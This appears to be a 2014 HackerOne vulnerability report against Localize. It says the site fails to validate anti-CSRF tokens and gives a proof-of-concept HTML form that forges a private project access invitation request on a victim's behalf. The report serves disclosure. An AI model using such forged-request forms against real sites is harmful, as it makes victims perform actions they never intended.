Localize: Private Project Access Request Invitation Sent Via CSRF

2014-04-20T18:02:43
ID H1:8226
Type hackerone
Reporter ajaysinghnegi
Modified 2014-04-21T02:49:03

Description

Hi Team,

I have found a CSRF vulnerability using which the attacker can do or force the victim to sent Private Project Access Invitation Request Via CSRF the anti-csrf token is not getting validated on the server-side.

Private Project Access Request Invitation Sent Via CSRF Code:

<html> <body> <form action="http://www.localize.io/" method="POST"> <input type="hidden" name="CSRFToken" value="" /> <input type="hidden" name="requestInvitation[repositoryID]" value="9p" /> <input type="submit" value="Submit form" /> </form> </body> </html>